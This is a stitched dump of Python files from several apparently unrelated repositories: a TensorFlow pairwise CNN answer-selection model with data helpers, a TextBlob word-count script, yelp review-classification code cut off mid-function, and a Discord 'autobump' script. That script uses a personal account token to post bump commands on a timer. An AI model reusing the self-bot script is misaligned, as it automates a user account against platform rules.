self.correct = tf.equal(0.0, self.losses)
self.accuracy = tf.reduce_mean(tf.cast(self.correct, "float"), name="accuracy")
tf.summary.scalar('accuracy', self.accuracy)
def create_op(self):
self.global_step = tf.Variable(0, name = "global_step", trainable = False)
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.grads_and_vars = self.optimizer.compute_gradients(self.loss)
self.train_op = self.optimizer.apply_gradients(self.grads_and_vars, global_step = self.global_step)
def max_pooling(self,conv,input_length):
pooled = tf.nn.max_pool(
conv,
ksize = [1, input_length, 1, 1],
strides = [1, 1, 1, 1],
padding = 'VALID',
name="pool")
return pooled
def getCosine(self,q,a):
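# cosine similarity between the pooled question and answer vectors, with dropout applied to
# both representations before computing the dot product and the norms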
pooled_flat_1 = tf.nn.dropout(q, self.dropout_keep_prob_holder)
pooled_flat_2 = tf.nn.dropout(a, self.dropout_keep_prob_holder)
pooled_len_1 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_1), 1))
pooled_len_2 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_2, pooled_flat_2), 1))
pooled_mul_12 = tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_2), 1)
score = tf.div(pooled_mul_12, tf.multiply(pooled_len_1, pooled_len_2), name="scores")
return score
def wide_convolution(self,embedding):
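# one SAME-padded convolution per filter size over the embedded sequence; the filter spans the
# full embedding dimension and the stride equals embedding_size, so each position yields
# num_filters values, and the per-size outputs are concatenated on the channel axis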
cnn_outputs = []
for i,filter_size in enumerate(self.filter_sizes):
conv = tf.nn.conv2d(
embedding,
self.kernels[i][0],
strides=[1, 1, self.embedding_size, 1],
padding='SAME',
name="conv-1"
)
h = tf.nn.relu(tf.nn.bias_add(conv, self.kernels[i][1]), name="relu-1")
cnn_outputs.append(h)
cnn_reshaped = tf.concat(cnn_outputs,3)
return cnn_reshaped
def variable_summaries(self,var):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def build_graph(self):
self.create_placeholder()
self.add_embeddings()
self.para_initial()
self.convolution()
self.pooling_graph()
self.create_loss()
self.create_op()
self.merged = tf.summary.merge_all()
def train(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
self.answer_negative:data[2],
# self.q_mask:data[3],
# self.a_mask:data[4],
# self.a_neg_mask:data[5],
self.dropout_keep_prob_holder:self.dropout_keep_prob
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[self.train_op, self.merged,self.global_step,self.loss, self.accuracy,self.score12,self.score13, self.see],
feed_dict)
return _, summary, step, loss, accuracy,score12, score13, see
def predict(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
# self.q_mask:data[2],
# self.a_mask:data[3],
self.dropout_keep_prob_holder:1.0
}
score = sess.run( self.score12, feed_dict)
return score
if __name__ == '__main__':
# __init__ expects a single option dict (the same structure models.setup() passes in);
# learning_rate is included because create_op() reads it when building the Adam optimizer
cnn = QA_CNN_extend({
'max_input_left': 33,
'max_input_right': 40,
'batch_size': 3,
'vocab_size': 5000,
'embedding_size': 100,
'filter_sizes': [3, 4, 5],
'num_filters': 64,
'hidden_size': 100,
'dropout_keep_prob': 1.0,
'embeddings': None,
'l2_reg_lambda': 0.0,
'learning_rate': 0.001,
'trainable': True,
'pooling': 'max',
'conv': 'wide'})
cnn.build_graph()
input_x_1 = np.reshape(np.arange(3 * 33),[3,33])
input_x_2 = np.reshape(np.arange(3 * 40),[3,40])
input_x_3 = np.reshape(np.arange(3 * 40),[3,40])
q_mask = np.ones((3,33))
a_mask = np.ones((3,40))
a_neg_mask = np.ones((3,40))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
feed_dict = {
cnn.question:input_x_1,
cnn.answer:input_x_2,
# cnn.answer_negative:input_x_3,
cnn.q_mask:q_mask,
cnn.a_mask:a_mask,
cnn.dropout_keep_prob_holder:cnn.dropout_keep_prob
# cnn.a_neg_mask:a_neg_mask
# cnn.q_pos_overlap:q_pos_embedding,
# cnn.q_neg_overlap:q_neg_embedding,
# cnn.a_pos_overlap:a_pos_embedding,
# cnn.a_neg_overlap:a_neg_embedding,
# cnn.q_position:q_position,
# cnn.a_pos_position:a_pos_position,
# cnn.a_neg_position:a_neg_position
}
question,answer,score = sess.run([cnn.question,cnn.answer,cnn.score12],feed_dict)
print( question.shape,answer.shape)
print( score)
| Python | 381 | 46.682415 | 147 | /models/QA_CNN_pairwise.py | 0.592162 | 0.5751 |
| shuishen112/pairwise-rnn | refs/heads/master |
from my.general import flatten, reconstruct, add_wd, exp_mask
import numpy as np
import tensorflow as tf
_BIAS_VARIABLE_NAME = "bias"
_WEIGHTS_VARIABLE_NAME = "kernel"
def linear(args, output_size, bias, bias_start=0.0, scope=None, squeeze=False, wd=0.0, input_keep_prob=1.0,
is_train=None):#, name_w='', name_b=''
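# flatten every input tensor to 2-D, optionally apply dropout, multiply the concatenation by a
# single weight matrix (plus optional bias), then reshape the result back to the leading
# dimensions of the first argument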
# if args is None or (nest.is_sequence(args) and not args):
# raise ValueError("`args` must be specified")
# if not nest.is_sequence(args):
# args = [args]
flat_args = [flatten(arg, 1) for arg in args]#[210,20]
# if input_keep_prob < 1.0:
# assert is_train is not None
flat_args = [tf.nn.dropout(arg, input_keep_prob) for arg in flat_args]
total_arg_size = 0#[60]
shapes = [a.get_shape() for a in flat_args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
# print(total_arg_size)
# exit()
dtype = [a.dtype for a in flat_args][0]
# scope = tf.get_variable_scope()
with tf.variable_scope(scope) as outer_scope:
weights = tf.get_variable(_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size], dtype=dtype)
if len(flat_args) == 1:
res = tf.matmul(flat_args[0], weights)
else:
res = tf.matmul(tf.concat(flat_args, 1), weights)
if not bias:
flat_out = res
else:
with tf.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
biases = tf.get_variable(
_BIAS_VARIABLE_NAME, [output_size],
dtype=dtype,
initializer=tf.constant_initializer(bias_start, dtype=dtype))
flat_out = tf.nn.bias_add(res, biases)
out = reconstruct(flat_out, args[0], 1)
if squeeze:
out = tf.squeeze(out, [len(args[0].get_shape().as_list())-1])
if wd:
add_wd(wd)
return out
def softmax(logits, mask=None, scope=None):
with tf.name_scope(scope or "Softmax"):
if mask is not None:
logits = exp_mask(logits, mask)
flat_logits = flatten(logits, 1)
flat_out = tf.nn.softmax(flat_logits)
out = reconstruct(flat_out, logits, 1)
return out
def softsel(target, logits, mask=None, scope=None):
"""
:param target: [ ..., J, d] dtype=float
:param logits: [ ..., J], dtype=float
:param mask: [ ..., J], dtype=bool
:param scope:
:return: [..., d], dtype=float
"""
with tf.name_scope(scope or "Softsel"):
a = softmax(logits, mask = mask)
target_rank = len(target.get_shape().as_list())
out = tf.reduce_sum(tf.expand_dims(a, -1) * target, target_rank - 2)
return out
def highway_layer(arg, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
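# standard highway layer: out = gate * relu(W_t x) + (1 - gate) * x, with both the transform
# and the gate computed by the linear() helper above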
with tf.variable_scope(scope or "highway_layer"):
d = arg.get_shape()[-1]
trans = linear([arg], d, bias, bias_start=bias_start, scope='trans', wd=wd, input_keep_prob=input_keep_prob)
trans = tf.nn.relu(trans)
gate = linear([arg], d, bias, bias_start=bias_start, scope='gate', wd=wd, input_keep_prob=input_keep_prob)
gate = tf.nn.sigmoid(gate)
out = gate * trans + (1 - gate) * arg
return out
def highway_network(arg, num_layers, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
with tf.variable_scope(scope or "highway_network"):
prev = arg
cur = None
for layer_idx in range(num_layers):
cur = highway_layer(prev, bias, bias_start=bias_start, scope="layer_{}".format(layer_idx), wd=wd,
input_keep_prob=input_keep_prob)
prev = cur
return cur
def conv1d(in_, filter_size, height, padding, keep_prob=1.0, scope=None):
with tf.variable_scope(scope or "conv1d"):
num_channels = in_.get_shape()[-1]
filter_ = tf.get_variable("filter", shape=[1, height, num_channels, filter_size], dtype='float')
bias = tf.get_variable("bias", shape=[filter_size], dtype='float')
strides = [1, 1, 1, 1]
in_ = tf.nn.dropout(in_, keep_prob)
xxc = tf.nn.conv2d(in_, filter_, strides, padding) + bias # [N*M, JX, W/filter_stride, d]
out = tf.reduce_max(tf.nn.relu(xxc), 2) # [-1, JX, d]
return out
def multi_conv1d(in_, filter_sizes, heights, padding, keep_prob=1.0, scope=None):
with tf.variable_scope(scope or "multi_conv1d"):
assert len(filter_sizes) == len(heights)
outs = []
for filter_size, height in zip(filter_sizes, heights):
if filter_size == 0:
continue
out = conv1d(in_, filter_size, height, padding, keep_prob=keep_prob, scope="conv1d_{}".format(height))
outs.append(out)
concat_out = tf.concat(outs, axis=2)
return concat_out
if __name__ == '__main__':
a = tf.Variable(np.random.random(size=(2,2,4)))
b = tf.Variable(np.random.random(size=(2,3,4)))
c = tf.tile(tf.expand_dims(a, 2), [1, 1, 3, 1])
test = flatten(c,1)
out = reconstruct(test, c, 1)
d = tf.tile(tf.expand_dims(b, 1), [1, 2, 1, 1])
e = linear([c,d,c*d],1,bias = False,scope = "test",)
# f = softsel(d, e)
with tf.Session() as sess:
tf.global_variables_initializer().run()
print(sess.run(test))
print(sess.run(tf.shape(out)))
exit()
print(sess.run(tf.shape(a)))
print(sess.run(a))
print(sess.run(tf.shape(b)))
print(sess.run(b))
print(sess.run(tf.shape(c)))
print(sess.run(c))
print(sess.run(tf.shape(d)))
print(sess.run(d))
print(sess.run(tf.shape(e)))
print(sess.run(e))
| Python | 160 | 36.712502 | 116 | /models/my/nn.py | 0.572754 | 0.558005 |
| shuishen112/pairwise-rnn | refs/heads/master |
from .QA_CNN_pairwise import QA_CNN_extend as CNN
from .QA_RNN_pairwise import QA_RNN_extend as RNN
from .QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN
def setup(opt):
if opt["model_name"]=="cnn":
model=CNN(opt)
elif opt["model_name"]=="rnn":
model=RNN(opt)
elif opt['model_name']=='qcnn':
model=QCNN(opt)
else:
print("no model")
exit(0)
return model
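# minimal usage sketch (mirrors run.py): build an option dict from the parsed flags plus the
# data-dependent fields, then let setup() choose the model class by its "model_name" entry, e.g.
#   opts = {"model_name": "cnn", "embeddings": embedding, "vocab_size": len(alphabet), ...}
#   model = setup(opts)
#   model.build_graph()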
| Python | 14 | 25.642857 | 58 | /models/__init__.py | 0.691689 | 0.689008 |
| shuishen112/pairwise-rnn | refs/heads/master |
# -*- coding: utf-8 -*-
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime
import os
import models
import numpy as np
import evaluation
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_rnn_flag()
#args = Singleton().get_8008_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("initialization done")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer()) # fun first than print or save
ckpt = tf.train.get_checkpoint_state("checkpoint")
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
print(sess.run(model.position_embedding)[0])
if os.path.exists("model") :
import shutil
shutil.rmtree("model")
builder = tf.saved_model.builder.SavedModelBuilder("./model")
builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
builder.save(True)
variable_averages = tf.train.ExponentialMovingAverage(0.999)  # ExponentialMovingAverage expects a decay rate; 0.999 is an assumed placeholder value
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
for name in variables_to_restore:
print(name)
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
text = "怎么 提取 公积金 ?"  # sample query in Chinese: "How do I withdraw my housing provident fund?"
splited_text=data_helper.encode_to_split(text,alphabet)
mb_q,mb_q_mask = data_helper.prepare_data([splited_text])
mb_a,mb_a_mask = data_helper.prepare_data([splited_text])
data = (mb_q,mb_a,mb_q_mask,mb_a_mask)
score = model.predict(sess,data)
print(score)
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.q_mask:data[2],
model.a_mask:data[3],
model.dropout_keep_prob_holder:1.0
}
sess.run(model.position_embedding,feed_dict=feed_dict)[0]
| Python | 114 | 31.622807 | 92 | /test.py | 0.651019 | 0.64324 |
| shuishen112/pairwise-rnn | refs/heads/master |
#-*- coding:utf-8 -*-
import os
import numpy as np
import tensorflow as tf
import string
from collections import Counter
import pandas as pd
from tqdm import tqdm
import random
from functools import wraps
import time
import pickle
def log_time_delta(func):
@wraps(func)
def _deco(*args, **kwargs):
start = time.time()
ret = func(*args, **kwargs)
end = time.time()
delta = end - start
print("%s ran for %.2f seconds" % (func.__name__, delta))
return ret
return _deco
# note: a second "import tqdm" here would shadow the tqdm() progress-bar function imported above
from nltk.corpus import stopwords
OVERLAP = 237
class Alphabet(dict):
def __init__(self, start_feature_id = 1):
self.fid = start_feature_id
def add(self, item):
idx = self.get(item, None)
if idx is None:
idx = self.fid
self[item] = idx
# self[idx] = item
self.fid += 1
return idx
def dump(self, fname):
with open(fname, "w") as out:
for k in sorted(self.keys()):
out.write("{}\t{}\n".format(k, self[k]))
def cut(sentence):
tokens = sentence.lower().split()
# tokens = [w for w in tokens if w not in stopwords.words('english')]
return tokens
@log_time_delta
def load(dataset, filter = False):
data_dir = "data/" + dataset
datas = []
for data_name in ['train.txt','test.txt','dev.txt']:
data_file = os.path.join(data_dir,data_name)
data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"]).fillna('0')
# data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"],quoting =3).fillna('0')
if filter == True:
datas.append(removeUnanswerdQuestion(data))
else:
datas.append(data)
# sub_file = os.path.join(data_dir,'submit.txt')
# submit = pd.read_csv(sub_file,header = None,sep = "\t",names = ['question','answer'],quoting = 3)
# datas.append(submit)
return tuple(datas)
@log_time_delta
def removeUnanswerdQuestion(df):
counter= df.groupby("question").apply(lambda group: sum(group["flag"]))
questions_have_correct=counter[counter>0].index
counter= df.groupby("question").apply(lambda group: sum(group["flag"]==0))
questions_have_uncorrect=counter[counter>0].index
counter=df.groupby("question").apply(lambda group: len(group["flag"]))
questions_multi=counter[counter>1].index
return df[df["question"].isin(questions_have_correct) & df["question"].isin(questions_have_uncorrect)].reset_index()
@log_time_delta
def get_alphabet(corpuses=None,dataset=""):
pkl_name="temp/"+dataset+".alphabet.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
alphabet = Alphabet(start_feature_id = 0)
alphabet.add('[UNK]')
alphabet.add('END')
count = 0
for corpus in corpuses:
for texts in [corpus["question"].unique(),corpus["answer"]]:
for sentence in texts:
tokens = cut(sentence)
for token in set(tokens):
alphabet.add(token)
print("alphabet size %d" % len(alphabet.keys()) )
if not os.path.exists("temp"):
os.mkdir("temp")
pickle.dump( alphabet,open(pkl_name,"wb"))
return alphabet
@log_time_delta
def getSubVectorsFromDict(vectors,vocab,dim = 300):
embedding = np.zeros((len(vocab),dim))
count = 1
for word in vocab:
if word in vectors:
count += 1
embedding[vocab[word]]= vectors[word]
else:
embedding[vocab[word]]= np.random.uniform(-0.5,+0.5,dim)#vectors['[UNKNOW]'] #.tolist()
print( 'word in embedding',count)
return embedding
def encode_to_split(sentence,alphabet):
indices = []
tokens = cut(sentence)
seq = [alphabet[w] if w in alphabet else alphabet['[UNK]'] for w in tokens]
return seq
@log_time_delta
def load_text_vec(alphabet,filename="",embedding_size = 100):
vectors = {}
with open(filename,encoding='utf-8') as f:
i = 0
for line in f:
i += 1
if i % 100000 == 0:
print('read %d lines' % i)
items = line.strip().split(' ')
if len(items) == 2:
vocab_size, embedding_size= items[0],items[1]
print( ( vocab_size, embedding_size))
else:
word = items[0]
if word in alphabet:
vectors[word] = items[1:]
print( 'embedding_size',embedding_size)
print( 'done')
print('words found in word2vec embedding ', len(vectors.keys()))
return vectors
@log_time_delta
def get_embedding(alphabet,dim = 300,language ="en",dataset=""):
pkl_name="temp/"+dataset+".subembedding.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
if language=="en":
fname = 'embedding/glove.6B/glove.6B.300d.txt'
else:
fname= "embedding/embedding.200.header_txt"
embeddings = load_text_vec(alphabet,fname,embedding_size = dim)
sub_embeddings = getSubVectorsFromDict(embeddings,alphabet,dim)
pickle.dump( sub_embeddings,open(pkl_name,"wb"))
return sub_embeddings
@log_time_delta
def get_mini_batch_test(df,alphabet,batch_size):
q = []
a = []
pos_overlap = []
for index,row in df.iterrows():
question = encode_to_split(row["question"],alphabet)
answer = encode_to_split(row["answer"],alphabet)
overlap_pos = overlap_index(row['question'],row['answer'])
q.append(question)
a.append(answer)
pos_overlap.append(overlap_pos)
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in mini_batches:
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_pos_overlap = [pos_overlap[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_pos_overlaps = prepare_data(mb_a,mb_pos_overlap)
yield(mb_q,mb_a)
# calculate the overlap_index
def overlap_index(question,answer,stopwords = []):
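# mark every answer token that also appears in the question with the special OVERLAP id (237);
# all other positions keep their 1-based index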
ans_token = cut(answer)
qset = set(cut(question))
aset = set(ans_token)
a_len = len(ans_token)
# q_index = np.arange(1,q_len)
a_index = np.arange(1,a_len + 1)
overlap = qset.intersection(aset)
# for i,q in enumerate(cut(question)[:q_len]):
# value = 1
# if q in overlap:
# value = 2
# q_index[i] = value
for i,a in enumerate(ans_token):
if a in overlap:
a_index[i] = OVERLAP
return a_index
def getBatch48008(df,alphabet,batch_size,sort_by_len = True,shuffle = False):
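# batch builder for the "8008" data set: the first 250 rows are treated as the candidate answer
# pool, the ground-truth answer index is looked up per question, and one random wrong candidate
# is sampled as the negative example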
q,a,neg_a=[],[],[]
answers=df["answer"][:250]
ground_truth=df.groupby("question").apply(lambda group: group[group.flag==1].index[0]%250 ).to_dict()
for question in tqdm(df['question'].unique()):
index= ground_truth[question]
canindates = [i for i in range(250)]
canindates.remove(index)
a_neg_index = random.choice(canindates)
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(answers[index],alphabet)
seq_neg_a = encode_to_split(answers[a_neg_index],alphabet)
q.append(seq_q)
a.append( seq_a)
neg_a.append(seq_neg_a )
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def iteration_batch(q,a,neg_a,batch_size,sort_by_len = True,shuffle = False):
if sort_by_len:
sorted_index = sorted(range(len(q)), key=lambda x: len(q[x]), reverse=True)
q = [ q[i] for i in sorted_index]
a = [a[i] for i in sorted_index]
neg_a = [ neg_a[i] for i in sorted_index]
# overlap features are not passed into this generator, so only q, a and neg_a are re-ordered
#get batch
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
if shuffle:
np.random.shuffle(idx_list)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in tqdm(mini_batches):
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_neg_a = [ neg_a[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_a_mask = prepare_data(mb_a)
mb_neg_a,mb_a_neg_mask = prepare_data(mb_neg_a)
yield(mb_q,mb_a,mb_neg_a,mb_q_mask,mb_a_mask,mb_a_neg_mask)
def get_mini_batch(df,alphabet,batch_size,sort_by_len = True,shuffle = False,model=None,sess=None):
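# pairwise batch construction: for every (question, positive answer) pair pick one negative
# answer, either the hardest one according to the current model's scores (when model/sess are
# given) or a random one otherwise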
q = []
a = []
neg_a = []
for question in df['question'].unique():
# group = df[df["question"]==question]
# pos_answers = group[df["flag"] == 1]["answer"]
# neg_answers = group[df["flag"] == 0]["answer"].reset_index()
group = df[df["question"]==question]
pos_answers = group[group["flag"] == 1]["answer"]
neg_answers = group[group["flag"] == 0]["answer"]#.reset_index()
for pos in pos_answers:
if model is not None and sess is not None:
pos_sent= encode_to_split(pos,alphabet)
q_sent,q_mask= prepare_data([pos_sent])
neg_sents = [encode_to_split(sent,alphabet) for sent in neg_answers]
a_sent,a_mask= prepare_data(neg_sents)
scores = model.predict(sess,(np.tile(q_sent,(len(neg_answers),1)),a_sent,np.tile(q_mask,(len(neg_answers),1)),a_mask))
neg_index = scores.argmax()
else:
if len(neg_answers.index) > 0:
neg_index = np.random.choice(neg_answers.index)
neg = neg_answers.reset_index().loc[neg_index,]["answer"]
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(pos,alphabet)
seq_neg_a = encode_to_split(neg,alphabet)
q.append(seq_q)
a.append(seq_a)
neg_a.append(seq_neg_a)
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def prepare_data(seqs,overlap = None):
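# pad a list of id sequences to the batch maximum length; returns the int32 id matrix together
# with either the aligned overlap-position matrix or a 0/1 float mask marking the real tokens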
lengths = [len(seq) for seq in seqs]
n_samples = len(seqs)
max_len = np.max(lengths)
x = np.zeros((n_samples,max_len)).astype('int32')
if overlap is not None:
overlap_position = np.zeros((n_samples,max_len)).astype('float')
for idx ,seq in enumerate(seqs):
x[idx,:lengths[idx]] = seq
overlap_position[idx,:lengths[idx]] = overlap[idx]
return x,overlap_position
else:
x_mask = np.zeros((n_samples, max_len)).astype('float')
for idx, seq in enumerate(seqs):
x[idx, :lengths[idx]] = seq
x_mask[idx, :lengths[idx]] = 1.0
# print( x, x_mask)
return x, x_mask
# def prepare_data(seqs):
# lengths = [len(seq) for seq in seqs]
# n_samples = len(seqs)
# max_len = np.max(lengths)
# x = np.zeros((n_samples, max_len)).astype('int32')
# x_mask = np.zeros((n_samples, max_len)).astype('float')
# for idx, seq in enumerate(seqs):
# x[idx, :lengths[idx]] = seq
# x_mask[idx, :lengths[idx]] = 1.0
# # print( x, x_mask)
# return x, x_mask
def getLogger():
import sys
import logging
import os
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.makedirs(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa'+timeStamp+'.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
return logger
| Python | 363 | 33.487602 | 167 | /data_helper.py | 0.582389 | 0.574804 |
| pablor0mero/Placester_Test_Pablo_Romero | refs/heads/master |
# For this solution I'm using TextBlob and its integration with WordNet.
from textblob import TextBlob
from textblob import Word
from textblob.wordnet import VERB
import nltk
import os
import sys
import re
import json
results = { "results" : [] }
#Override NLTK data path to use the one I uploaded in the folder
dir_path = os.path.dirname(os.path.realpath(__file__))
nltk_path = dir_path + os.path.sep + "nltk_data"
nltk.data.path= [nltk_path]
#Text to analyze
TEXT = """
Take this paragraph of text and return an alphabetized list of ALL unique words. A unique word is any form of a word often communicated
with essentially the same meaning. For example,
fish and fishes could be defined as a unique word by using their stem fish. For each unique word found in this entire paragraph,
determine the how many times the word appears in total.
Also, provide an analysis of what sentence index position or positions the word is found.
The following words should not be included in your analysis or result set: "a", "the", "and", "of", "in", "be", "also" and "as".
Your final result MUST be displayed in a readable console output in the same format as the JSON sample object shown below.
"""
TEXT = TEXT.lower()
WORDS_NOT_TO_CONSIDER = ["a", "the", "and", "of", "in", "be", "also", "as"]
nlpText= TextBlob(TEXT)
def getSentenceIndexesForWord(word, sentences):
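# return the indexes of every sentence that contains the word as a whole word (case-insensitive,
# using a \b-delimited regex so substrings do not count)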
sentenceIndexes = []
for index, sentence in enumerate(sentences):
count = sum(1 for _ in re.finditer(r'\b%s\b' % re.escape(word.lower()), sentence))
if count > 0:
sentenceIndexes.append(index)
return sentenceIndexes
#1: Get all words, excluding repetitions and all the sentences in the text
nlpTextWords = sorted(set(nlpText.words))
nlpTextSentences = nlpText.raw_sentences
#2 Get results
synonymsList = []
allreadyReadWords = []
for word in nlpTextWords:
if word not in WORDS_NOT_TO_CONSIDER and word not in allreadyReadWords:
timesInText = nlpText.word_counts[word]
#Get sentence indexes where the word can be found
sentenceIndexes = getSentenceIndexesForWord(word, nlpTextSentences)
#Check for synonyms
for word2 in nlpTextWords:
if word2 not in WORDS_NOT_TO_CONSIDER and ( word.lower() != word2.lower() and len(list(set(word.synsets) & set(word2.synsets))) > 0 ):
#If I find a synonym of the word I add it to the list of words allready read and add the times that synonym appeared in the text to the total
#count of the unique word and the corresponding sentence indexes
allreadyReadWords.append(word2)
timesInText = timesInText + nlpText.word_counts[word2]
sentenceIndexes += getSentenceIndexesForWord(word2,nlpTextSentences)
allreadyReadWords.append(word)
results["results"].append({"word" : word.lemmatize(), #I return the lemma of the word because TextBlob's stems seem to be wrong for certain words
"total-occurances": timesInText,
"sentence-indexes": sorted(set(sentenceIndexes))})
print(json.dumps(results, indent=4))
|
Python
| 71
| 44.929577
| 157
|
/main.py
| 0.670813
| 0.666869
|
GabinCleaver/Auto_Discord_Bump
|
refs/heads/main
|
import requests
import time
token = "TOKEN"
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
id = input(f"[?] Salon ID: ")
print("")
while True:
requests.post(
f"https://discord.com/api/channels/{id}/messages",
headers = headers,
json = {"content" : "!d bump"}
)
print("[+] Serveur Bumpé")
time.sleep(121 * 60)
|
Python
| 21
| 20.809525
| 109
|
/autobump.py
| 0.561845
| 0.51153
|
altopalido/yelp_python
|
refs/heads/master
|
# Madis Settings
MADIS_PATH='/Users/alexiatopalidou/Desktop/erg/madis/src'
# Webserver Settings
# IMPORTANT: The port must be available.
web_port = 9090 # must be an integer (e.g. 9090), not a string like '9090'
|
Python
| 6
| 31.666666
| 57
|
/yelp_python/settings.py
| 0.75
| 0.709184
|
altopalido/yelp_python
|
refs/heads/master
|
# ----- CONFIGURE YOUR EDITOR TO USE 4 SPACES PER TAB ----- #
import settings
import sys
def connection():
''' Use this function to create your connections '''
import sys
sys.path.append(settings.MADIS_PATH)
import madis
con = madis.functions.Connection('/Users/alexiatopalidou/Desktop/erg/yelp_python/yelp.db')
return con
def classify_review(reviewid):
#check for compatible data type
try:
val=str(reviewid)
except ValueError:
return [("Error! Insert correct data type.")]
# Create a new connection
global con
con=connection()
# Create cursors on the connection
#alternative: create the desired list after every textwindow, posterms, negterms query
cur=con.cursor()
cura=con.cursor()
curb=con.cursor()
cur1=con.cursor()
cur2=con.cursor()
#check that the given data exists inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('reviewid',?)",(reviewid,))
check=curcheck.execute("SELECT review_id from reviews where review_id=?",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Review id.",)]
#sql query with textwindow - one for each occasion (terms with 1, 2 or 3 words)
res=cur.execute("SELECT textwindow(text,0,0,1) from reviews where review_id=var('reviewid');")
resa=cura.execute("SELECT textwindow(text,0,0,2) from reviews where review_id=var('reviewid');")
resb=curb.execute("SELECT textwindow(text,0,0,3) from reviews where review_id=var('reviewid');")
#get positive/negative terms
res1=cur1.execute("SELECT * from posterms;")
res2=cur2.execute("SELECT * from negterms;")
#create lists that store a) all the review's terms, b) positive terms and c) negative terms
k=[]
for n in res:
k.append(n)
for n in resa:
k.append(n)
for n in resb:
k.append(n)
m=[]
for z in res1:
m.append(z)
o=[]
for p in res2:
o.append(p)
#check if the review is positive or negative
x=0
for i in k:
for j in m:
if i==j:
x=x+1
y=0
for i in k:
for j in o:
if i==j:
y=y+1
if x>y:
rsl='positive'
elif x<y:
rsl='negative'
else:
